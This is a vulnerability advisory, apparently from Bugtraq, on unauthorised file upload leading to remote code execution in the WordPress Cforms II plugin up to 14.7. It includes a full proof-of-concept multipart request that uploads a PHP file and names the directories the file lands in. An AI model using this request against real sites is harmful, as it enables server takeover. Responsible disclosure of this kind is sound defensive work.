Advisory: Remote Code Execution via Unauthorised File upload in Cforms 14.7 
Advisory ID: -
Author: Zakhar Fedotkin
Affected Software: Wordpress Plugin Cforms II  14.x-14.7 (Release: 12th Nov 2014)
Vendor URL: https://wordpress.org/plugins/cforms2/
Vendor Status: fixed
CVE-ID: -

==========================
Vulnerability Description:
==========================

The Cforms 14.7 and before are vulnerable to unauthorised user file upload. It's affected contact forms thats was created without file upload box. File lib_nonajax.php accept files with all extensions, that could lead to remote code execution

==================
Technical Details:
==================

POC:
Request to the valid contact form looks like:
POST /wordpress/ HTTP/1.1
..
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------13530703071348311666826727318
Content-Length: 1747
-----------------------------13530703071348311666826727318
Content-Disposition: form-data; name="cf2_field_1"
-----------------------------13530703071348311666826727318
Content-Disposition: form-data; name="cf2_field_2"
test
-----------------------------13530703071348311666826727318
Content-Disposition: form-data; name="cf2_field_3"
test@test.com
-----------------------------13530703071348311666826727318
Content-Disposition: form-data; name="cf2_field_4"
http://
-----------------------------13530703071348311666826727318
Content-Disposition: form-data; name="cf_uploadfile2[]"; filename="up.php"
Content-Type: text/php
<? phpinfo(); ?>
-----------------------------13530703071348311666826727318
Content-Disposition: form-data; name="cf_working2"
<span>One%20moment%20please...</span>
-----------------------------13530703071348311666826727318
Content-Disposition: form-data; name="cf_failure2"
<span>Please%20fill%20in%20all%20the%20required%20fields.</span>
-----------------------------13530703071348311666826727318
Content-Disposition: form-data; name="cf_codeerr2"
<span>Please%20double-check%20your%20verification%20code.</span>
-----------------------------13530703071348311666826727318
Content-Disposition: form-data; name="cf_customerr2"
yyy
-----------------------------13530703071348311666826727318
Content-Disposition: form-data; name="cf_popup2"
nn
-----------------------------13530703071348311666826727318
Content-Disposition: form-data; name="sendbutton2"
1
-----------------------------13530703071348311666826727318--
The error is in lib_nonajax.php and default settings lib_nonajax.php allow to upload files to the default directory for versions below 14..6.3 it is cfroms plugin home directory. For version 14.6.3 and after it is wordpress upload directory. Default settings for contact form without upload field is None, so it's possible to upload *.php file.


=========
Solution:
=========

Update to the latest version

====================
Disclosure Timeline:
====================

15-Dec-2014 ? found the vulnerability
22-Dec-2014 - informed the developers
23-Dec-2014 - response by vendor
27-Dec-2014 ? fix by vendor
29-Dec-2014 - release date of this security advisory
29-Dec-2014 - post on Bugtraq

========
Credits:
========

Vulnerability found and advisory written by Zakhar Fedotkin.

===========
References:
===========

https://wordpress.org/plugins/cforms2/
http://infosec.ru